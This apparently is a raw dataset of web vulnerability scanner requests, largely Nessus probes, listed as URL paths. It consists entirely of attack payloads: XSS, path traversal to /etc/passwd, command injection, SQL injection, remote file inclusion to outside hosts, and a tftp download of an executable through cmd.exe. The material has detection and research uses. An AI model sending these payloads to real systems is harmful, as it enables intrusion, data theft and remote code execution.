/etc/passwd\n/byrg33fw.cfm?<script>document.cookie=\"testexuu=5340;\"</script>\n/examples/jsp/jsp2/el/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd\n/weq93ppb.php?<script>cross_site_scripting.nasl</script>\n/javascript/mbox.exe\n/top.php?stuff='\\x0ddel\\x09q21461883\\x09#\n/lmw4r201.do?<script>document.cookie=\"testwews=8477;\"</script>\n/examples/jsp/jsp2/el/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h\n/kpscripts/\n/mpcgi/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/top.php?stuff='|sleep 10 #\n/scripts/webadmin.php?show=/etc/passwd\n/cgi-sys/gw5/gwweb.exe?htmlver=aaa&get-context\n/subscriptions.properties\n/quagynka.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scgi-bin/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/index.php?|=../../../../../../../../../etc/passwd\n/6dlc2zm9.nsf?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/cgi-bin/whois.cgi?lookup=;&ext=/bin/cat /etc/passwd\n/examples/jsp/colors/top.php?header=../../../../../../../../etc/passwd\n/zv8tv7h8.dll?<script>document.cookie=\"testcqwz=9752;\"</script>\n/82q7ywa8.jsp?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/byrg33fw.do?<script>document.cookie=\"testexuu=5340;\"</script>\n/scripts/admin/admin.php?sid=0'\n/o35zot2r.fts?<script>cross_site_scripting.nasl</script>\n/scripts/_admin/\n/cgi-bin/perl.exe\n/help.php?q=\"rm\\x09q34493999&rem\\x09\n/cat-scripte/\n/help.php?q=\"ping,-w,11000,-n,1,1.2.3.4|rem,\n/&#xc9;cole_marketing/\n/scripts/sql/install-0.9.7.php?p=2\n/j2kdmfw4.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/uc3w3bdi.do?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/transcript_day1/\n/main.php?logout=ver;>q78779487&rem;\n/cacti/wa.exe?debug-show-version\n/i7prbs22.fts?<script>document.cookie=\"testjnre=7328;\"</script>\n/scripts/index.php?id=hw828khs0f'\n/coursedescriptions06/\n/examples/jsp/sessions/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/colors/gadgets/blog/blogmodel.php?path=/etc/passwd\\x00\n/main.php?logout=\"&del\\x0cq71167917&rem\\x0c\n/scripts/admin.php?loggedin=1\n/0u75ldxq.nsf?<script>cross_site_scripting.nasl</script>\n/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd\n/javascript/dumps.exe\n/scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331905219','5'--\n/hipkz026.fts?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/s7qus4g3.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jdx255ea.x?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/call me when you're sober/\n/igtf0zon.htm?<script>cross_site_scripting.nasl</script>\n/manager/index.php?name=your account&profile=anyone\"><script>alert('nessus was here');</script>\n/examples/jsp/colors/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login\n/manager/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f\n/main.php?stuff=&ver\\xa0>q58155175&rem\\xa0\n/javascript/def.exe\n/carisoprodol_prescription/\n/examples/jsp/sessions/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script>\n/index.php?ando=comentarios&entrada=1'generate error\n/en-us/account/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\\x00|\n/manager/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; \n/x7pclv4s.dll?<script>document.cookie=\"testiulz=3709;\"</script>\n/javascript/clear.exe\n/manager/story.pl?next=../../../../../etc/passwd\\x00\n/scripts/welcome.php?custom_welcome_page=/etc/passwd\\x00\n/zmvq66jy.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zln2hm2z.fts?<script>document.cookie=\"testblcp=8120;\"</script>\n/examples/jsp/error/home/search.asp?nchannel='1\n/bzuf9ozq.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/app/xss/flashtimeline\n/main.php?stuff=\"ver\\xa0>q89318346&rem\\xa0\n/webcgi/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/q703m78q.php3?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/main.php?stuff=\";uname >q31473843 #\n/n1afe1y6.html?<script>cross_site_scripting.nasl</script>\n/internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini\n/scripts/index.php?option=frontpage&itemid=2|system(id)|1332009306\n/j734qobz.htm?<script>cross_site_scripting.nasl</script>\n/modules.php?name=stories_archive&sa=show_month&year=2002&month=03&month_l=<script>alert('vulnerable')</script>\n/carbo.dll?icatcommand=..\\..\\..\\..\\..\\..\\winnt\\win.ini&catalogname=catalog\n/examples/jsp/sessions/bb_func_txt.php?pathtofiles=/etc/passwd\\x00\n/main.php?logout='\\x0adel\\x09q29624474\\x09#\n/'.$_server['php_self'].'?'.$_server['query_string'].'&act=img&img=change\n/phpmyadmin/direct.php?rf=/etc/passwd\\x00\n/j734qobz.php?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/file.php?path=/etc/passwd\\x00\n/javascript/.passwd.dump\n/examples/jsp/error/cvslog.cgi?file=<script>window.alert</script>\n/javascript/forum1.exe\n/direct.php?rf=/etc/passwd\\x00\n/scripts/backofficeplus/comersus_backoffice_index.asp\n/javascript/wa.exe\n/?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/rv98iwjp.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/miz4r5hz.mscgi?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/manager/index.php?id=0rop9yeuxw'\n/scripts/admin/define.inc.php?match=http://xxxx./\n/recordings/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script\n/examples/jsp/sessions/login.php?course=\"><script>alert(atutor_xss.nasl)</script>\n/jnt3f86c.mscgi?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/top.php?stuff=\"del\\xa0q56682636&rem\\xa0\n/tim post's tomorrow/\n/help.php?q=\"&ver\\x0b>q12933545&rem\\x0b\n/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331908877,462918967 -- \n/cgi-914/r.cgi?file=../../../../../../../../../../etc/passwd\n/examples/jsp/colors/php.cgi?/etc/passwd\n/confirmunsubscription.php?output=http://192.168.202.96:8080/4dckqcc0acprbz?\n/users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\n/main.php?stuff=\"&rm;q22147997&rem;\n/ywaxntrx.cgi?<script>cross_site_scripting.nasl</script>\n/9ko6m4c8.nsf?<script>document.cookie=\"testylik=3403;\"</script>\n/main.php?logout=\"&ping\\x09-w\\x0910000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/javascript/.ssh.exe\n/help.php?q=\"rm q77224434&rem \n/yver8r9o.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/um7xpn15.jsp?<script>document.cookie=\"testotoy=6142;\"</script>\n/default.php?info_message=<script language=javascript>window.alert(document.cookie);</script>\n/main.php?logout=;sleep\\x097\\x09#\n/q703m78q.jspa?<script>document.cookie=\"testvowq=604;\"</script>\n/examples/jsp/jsp2/jspx/protection.php?action=logout&siteurl=/etc/passwd\n/activatemember?activatecode=&member=\"><script>alert('mvnforum_activatemember_xss.nasl')</script>\n/space1105xss_485/\n/jack's big tit show/\n/iajtej82.html?<script>cross_site_scripting.nasl</script>\n/en-us/7o5qp766.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/help.php?section='qualiteam_xcart_sql_xss.nasl\n/cgibin/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6116917755.old\n/cgis/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/manager/bb-hist.sh?histfile=../../../../../etc/passwd\n/recordings/install.php?newlang=../../cpg_error.log\\x00\n/help.php?q=ver,>q57259291&rem,\n/3j8echh0.asp?<script>document.cookie=\"testfuqi=4189;\"</script>\n/javascript/squirrelmail.exe\n/j4rdyhw8.php3?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/examples/jsp/checkbox/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\\x00\n/3j8echh0.cfm?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/pi_transcript/\n/j4drbkil.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/j2kdmfw4.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"rm\\x0bq12768472&rem\\x0b\n/cgi-bin/..%u00255c..%u00255c/winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/main.php?logout=';del q89385457 #\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/j4rdyhw8.kspx?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/manager/wa.exe?debug-show-version\n/javascript/.passwd.test\n/fmnveedu.jsp?<script>document.cookie=\"testgfbr=7014;\"</script>\n/help.php?q=\";del\\x09q32988845\\x09#\n/scripts/rvckwz6smkqf.sh\n/javascript/menu.exe\n/main.php?stuff=\"rm\\xa0q67484693&rem\\xa0\n/javascript/~john.exe\n/examples/jsp/jsp2/jspx/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script\n/ny1b3qq4.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/login.php?course=\"><script>alert(atutor_xss.nasl)</script>\n/javascript/product_info.exe\n/prescription-zyrtec/\n/en-us/9kr0ih0v.x?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/v3axg1p8.cgi?<script>document.cookie=\"testxagh=6987;\"</script>\n/examples/jsp/sessions/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/setup-script/\n/cgi-bin/visadmin.exe\n/zmvq66jy.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/x7pclv4s.exe?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/cacti/js/scripts.php?load=/etc/passwd\\x00\n/phpmyadmin/directory.php?dir=;cat /etc/passwd\n/examples/jsp/jsp2/el/index.php?entry='\n/help.php?q=\"&ver\\xa0>q55891755&rem\\xa0\n/scripts/..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/help.php?q=\"ping,-w,9000,-n,1,1.2.3.4|rem,\n/cgi-bin/../../../../../../../../../../winnt/system32/ipconfig.exe\n/javascript/notify.exe\n/zmvq66jy.htm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>\n/examples/jsp/num/help.php?section='qualiteam_xcart_sql_xss.nasl\n/scripts/ui/login?user=nessus-1332010196\n/w4996nr0.idc?<script>document.cookie=\"testttvs=7163;\"</script>\n/byrg33fw.aspx?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,512612977),3,4,5,6,7,8,9,10,11,12,13,14,15,16\n/top.php?stuff=\"|sleep\\x099\\x09#\n/cgi-bin/index.php?src=1&_common=1&time=1331908739&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/checkbox/user.cgi?url=\"><script>alert(\"gossamer_links_url_xss.nasl\");</script>&from=add\n/examples/jsp/sessions/starnet/addons/slideshow_full.php?album_name='2425357\n<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/rv98iwjp.cgi?<script>cross_site_scripting.nasl</script>\n/vac1l5vm.jsp?<script>cross_site_scripting.nasl</script>\n/php_scripts/\n/top.php?stuff=;rm q61859553 #\n/examples/jsp/sessions/survey.inc.php?path=/etc/passwd\\x00\n/t578vqea.jsp?<script>document.cookie=\"testsory=7676;\"</script>\n/g3w7y7u5.pl?<script>document.cookie=\"testbfpq=3326;\"</script>\n/javascript/intro.exe\n/r02_pac'slife/\n/copatranscript_20061115/\n/javascript/moved.exe\n/o6ebbirj.nsf?<script>cross_site_scripting.nasl</script>\n/<script>document.cookie=\"testkogj=3979;\"</script>\n/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script>\n/vac1l5vm.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd\n/help.php?q=\"|ping;-w;10000;-n;1;4.3.2.1|rem;\n/help.php?q='rm\\x09q97653798\\x09#\n/top.php?stuff=\"ping -w 8000 -n 1 4.3.2.1|rem \n/examples/jsp/jsp2/jspx/cvslog.cgi?file=<script>window.alert</script>\n/www/delivery/ac.php?bannerid=-1331908788+or+1=1+--+';passthru(base64_decode($_server[http_nessus_s3jekbai]));die;/*\n/main.php?stuff='&del\\x09q28979577\\x09#\n/manager/rot13sj.cgi?/etc/passwd\n/en-us/account/cwmail.exe\n/scripts/search.php?submit=true&search=');\n/viewcart.asp?userid='\n/examples/jsp/error/webadmin.php?show=/etc/passwd\n/7dbjwpw6.pl?<script>cross_site_scripting.nasl</script>\n/scripts/listinfo/\n/b1q8bywu.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/websense/cgi-bin/wscgilogin.exe?page=login&username=nessus\"><script>alert('websense_username_xss.nasl')</script>\n/cgi.cgi/texis.exe/junk\n/examples/jsp/sessions/ncbook/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/dir_thatware/config.php?root_path=http://192.168.202.96:8080/llumt7msyau5y?'\n/scriptpath/index.php?page=http://192.168.202.96:8080/llumt7msyau5y?\n/weq93ppb.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/t769qwej0llr.asp\n/nuh3zirz.cgi?<script>cross_site_scripting.nasl</script>\n/script_colorcod/\n/rbec2ohx.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/search.jsp?q=%\"<script>alert(1331919151)</script>\n/main.php?stuff=\"uname\\x09>q51339959\\x09#\n/h5i6crm3.jsp?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/cgi-exe/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/main.php?stuff=\"&ping -w 7000 -n 1 4.3.2.1&rem \n/main.php?stuff=\"\\x0arm\\x09q72429699\\x09#\n/top.php?stuff=&rm;q55714714&rem;\n<script>document.cookie=\"testhhwu=7044;\"</script>\n/main.php?stuff=\"&del\\x09q54676593\\x09#\n/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>\n/examples/jsp/nummultihtml.pl?multi=/etc/passwd\\x00html\n/en-us/account/admin/configset.php?settings_dir=/etc/passwd\\x00\n/examples/jsp/cal/sendtemp.pl?templ=../../../../../etc/passwd\n/17-doin' time/\n/scripts/nph-mr.cgi\n/zln2hm2z.mscgi?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/examples/jsp/cal/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/cpanel_xss/\n/scripts/index.php?op=default&date=200607' union select 1,2098983739,1,1,1,1,1,1,1,1--&blogid=1\n/scripts/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1\n/top.php?stuff=\"\\x0dsleep\\x099\\x09#\n/main.php?stuff=\"ping\\x09-w\\x099000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/scripts/web_store/web_store.cgi?page=../../../../../../etc/passwd\\x00.html\n/examples/jsp/num/wiki.php/<script>foo</script>\n/h5i6crm3.php?<script>document.cookie=\"testlihk=7070;\"</script>\n/top.php?stuff=\"|ping\\xa0-w\\xa07000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n///../../../../boot.ini\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=q99411377&frm_user=&scr_height=&scr_width=\n/examples/servlets/servlet/activatemember?activatecode=&member=\"><script>alert('mvnforum_activatemember_xss.nasl')</script>\n/examples/jsp/sessions/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold\n/transcription/\n/lmw4r201.idc?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+24+1c+50+6a+00+68+65+73+73+00+68+50+72+6f+63+68+74+69+6f+6e+68+6f+72+6d+61++>>ctdn\n/bin/fpsrvadm.exe\n/scripts/plog-rss.php?level=collection&id=999 or plogger_id_sql_injection.nasl\n/cacti/kb.cgi?view='&lang=en\n/recordings/base_qry_common.php?base_path=/etc/passwd\\x00\n/ghswfouu.aspx?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/recordings/pfdispaly.cgi?../../../../../../etc/passwd\n/help.php?q='uname\\x09>q87915929\\x09#\n/examples/jsp/checkbox/includes/config.php?relative_script_path=http://xxxxxxx\n/cgi-bin/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/j4oqyvga.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/fo564rei.asp?<script>cross_site_scripting.nasl</script>\n/l13b77e5.x?<script>document.cookie=\"testjvvf=7721;\"</script>\n/g8nu2yy7.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"&rm\\x09q54676593\\x09#\n/?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/j4oqyvga.asp?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"\\x0drm\\x09q32424996\\x09#\n/h5i6crm3.pl?<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/scripts/proxy/w3proxy.dll\n/7uz3ok60.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7uz3ok60.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/document.log\n/cgi-bin/language.php?data_dir=/etc/passwd\\x00\n/i686v90l.cgi?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/fo564rei.php?<script>cross_site_scripting.nasl</script>\n/pdfdescription/\n/en-us/w4996nr0.x?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/8t9v8k7x.jspa?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/recordings/cvslog.cgi?file=<script>window.alert</script>\n/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/vir0v3xfc?\\x00\n/help.php?q=\"rm\\x09q96611289\\x09#\n/site_scripts/\n/en-us/33y9gcqq.asp?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/h21y8w52.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0174\\0044\\0000\\0377\\0347\" >> /tmp/qcywjpzuja0;echo|awstats577013.txt\n/phpmyadmin/index.php?name=your account&profile=anyone\"><script>alert('nessus was here');</script>\n/javascript/pt.exe\n/cgi-sys/texis.exe/junk\n/en-us/h5sc3gxy.cgi?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"&ping\\x09-w\\x0911000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/main.php?stuff=\"del\\x09q12267523&rem\\x09\n/examples/jsp/checkbox/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/num/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00\n/scripts/wa.exe?debug-show-version\n/index.php?c=access&a=login&ref_c=nessus\"><script>alert(202948572)</script>&ref_a=projectpier_login_page_xss.nasl\"><script>alert(1176363922)</script>\n/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\/windows/win.ini\n/top.php?stuff=\"&ping\\xa0-w\\xa07000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/main.php?stuff=\"sleep\\x099\\x09#\n/cgi-local/msmmask.exe?mask=/junk334\n/l752x1ry.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd\n/?<script>document.cookie=\"testknim=9383;\"</script>\n/top.php?stuff=\"\\x0adel q56276124 #\n/cgi-bin/calendar.php?serverpath=/etc/passwd\\x00\n/javascript/.passwd.pl\n/cgi-bin/uploader.exe\n/scripts/2k1m.exe?/x+/c+tftp -i 192.168.202.118 get hvtftjuy dgkirazl.exe\n/en-us/account/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\\x00\n/examples/servlets/servlet/classes/adodbt/sql.php?classes_dir=/etc/passwd\\x00\n/en-us/account/cal_week.php?op=week&catview=999'\n/zuihld5m.htm?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/index.php?mod_id=2&kb_ask=</textarea><script>alert(\"cerberus_support_center_mult_flaws.nasl\")</script>\n/en-us/account/al_initialize.php?alpath=/etc/passwd\\x00\n/nmw0do67.cgi?<script>cross_site_scripting.nasl</script>\n/en-us/account/cgiforum.pl?thesection=../../../../../../../../etc/passwd\\x00\n/javascript/pop3.exe\n/apavxugx.do?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/javascript/submissions.exe\n/cgi-bin/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\\x00\n/recommend.php?id='</a><iframe src=javascript:alert(%27xss%27)></iframe>\n/mv8wxfy9.cfc?<script>document.cookie=\"testrhbc=8184;\"</script>\n/cgi-win/.htpasswd\n/bin/cfgwiz.exe\n/subscriptions.core\n/cgi-bin/includes/converter.inc.php?include_path=/etc/passwd\\x00\n/main.php?stuff='&sleep\\x098\\x09#\n/hotmail_xss/\n/cacti/ion-p.exe?page=../../../../../etc/passwd\n/examples/jsp/colors/user.cgi?url=\"><script>alert(\"gossamer_links_url_xss.nasl\");</script>&from=add\n/javascript/bat.exe\n/javascript/httpd.exe\n/javascript/monitors.exe\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/tmcrsoeqnm0;'); function v\n/javascript/_adm.exe\n/scripts/psunami.cgi?file=|id|\n/scripts/mail.php?id='/**/union/**/select/**/1,2,1331919224,4--&blog=1\n/6n7aacgg.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q='\\x0arm\\x09q79344163\\x09#\n/phpmyadmin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331923197',null,null,null,null --\n/a0imiuf1.exe?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/scripts/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id\n/javascript/~jacob.exe\n/3m5knyc4.htm?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n//<body><script/src=\"http://www.example.com/test?rnd=q26857453\"></script>\n/subscription/\n/en-us/esmozg5d.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/index.php?gadget=../../../../../../etc/passwd\\x00&path=/etc\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/en-us/account/cal_make.pl?p0=../../../../../../../../../etc/passwd\\x00\n/javascript/webaccess.exe\n/htbin/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/i2n4v4rl.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/alias.exe\n/6n7aacgg.cgi?<script>cross_site_scripting.nasl</script>\n/dda2qr7j.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bn857frh.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"&uname\\x09>q84263823\\x09#\n/examples/jsp/sessions/search=<script>alert('xss')</script>\n/main.php?stuff='&del q97413885 #\n/scripts/tinfo.php?id=1332009304\n//</p><body><script/src=\"http://www.example.com/test?rnd=q18539236\"></script><p>\n/cgi-bin/index.php?src=1&_common=1&time=1331923205&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/help.php?q=\"&del q92537281&rem \n/1qwv2p5p.exe?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/examples/jsp/cal/index.php?id='union/**/select/**/0,0,1317538123,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/main.php?stuff=\"ping\\x0c-w\\x0c9000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/cgi.cgi/gw5/gwweb.exe?htmlver=aaa&get-context\n/top.php?stuff='&rm\\x09q76725442\\x09#\n/javascript/text-base.exe\n/main.php?logout='del q29138864 #\n/examples/jsp/error/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\\x00\n/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini\n/top.php?stuff=\"|ping -w 11000 -n 1 1.2.3.4|rem \n/inc/download_center_lite.inc.php?script_root=http://192.168.202.118:8080/ghl9il?\n/actscript2/\n/javascript/tree.exe\n/main.php?stuff=\"ping\\x0b-w\\x0b8000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/scripts/man2html?section=-p id&topic=w\n<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/javascript/bill.exe\n/top.php?stuff='sleep\\x0911\\x09#\n/examples/jsp/cal/admin/admin.php?sid=0'\n/subscriptinfo/\n/nph-script/\n/<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/tuwjta1w.cfm?<script>document.cookie=\"testpokn=7494;\"</script>\n/examples/jsp/colors/edit.jsp?page=user&editor=../../../install\n/cacti/check_user_id.php?user_id=<script>foo</script>\n/cgi-bin/fpsrvadm.exe\n/scripts/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\\x00\n/cgi-bin/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id\n/vmi8bb12.asp?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/javascript/e2fs.exe\n/x2gyorli.asp?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/administrator/gallery/gallery.php?directory=\\\"<script>alert(document.cookie)</script>\n/main.php?logout=\"|ping\\xa0-w\\xa09000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/interface/login/login_frame.php?site=<script>alert(owasp zap);</script>'injected_param\n/i2n4v4rl.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>\n/scripts/polls.scr.php?globals[pth][classes]=http://cirt.net/rfiinc.txt??\n/help.php?q=\"|sleep 10 #\n/editor&#39;s-blog/\n/\\xd0\\x9a\\xd0\\xbe\\xd0\\xbc\\xd0\\xbf'\\xd1\\x8e\\xd1\\x82\\xd0\\xb5\\xd1\\x80\\xd0\\xb8/\n/javascript/.htaccess/skipfish://invalid/;?\n/h4bi26jd.mscgi?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/scs86g1p.aspx?<script>document.cookie=\"testquyx=2820;\"</script>\n/byrg33fw.kspx?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/qhvu0pdg.html?<script>document.cookie=\"testchuc=2100;\"</script>\n/top.php?stuff=\"&ver >q85227619&rem \n/phpmyadmin/mapserv.exe?map=mapserver_detect.nasl.map\n/cgi-bin/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\\x00\n/edv3mapy.cfm?<script>cross_site_scripting.nasl</script>\n/gallery/search.php?searchstring=<script>alert(document.cookie)</script>\n/8x6w469u.aspx?<script>document.cookie=\"testgfjr=1286;\"</script>\n/phpmyadmin/whois.cgi?action=load&whois=;id\n/top.php?stuff=\"&rm\\x09q42671474&rem\\x09\n/main.php?stuff=\"&rm q89179194&rem \n/examples/jsp/jsp2/el/search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini\n/psynch/nph-psf.exe?css=http://192.168.202.118:8080/2aibfaczmac8?\n/<script>document.cookie=\"testhhwu=7044;\"</script>\n/examples/servlets/servlet/help.php?section='qualiteam_xcart_sql_xss.nasl\n/iajtej82.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+00+00+00+00+00+00+00+01+00+00+0e+1f+ba+0e+00+b4+09+cd+21+b8+01++>>esbq\n/scripts/2sfdqydfaknx.php3\n/9ko6m4c8.asp?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/phpmyadmin/item.fts?href=\"><script>alert(\"ftgate_44002.nasl\")</script>;\n/cacti/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd\n/tuwjta1w.cfc?<meta http-equiv=set-cookie 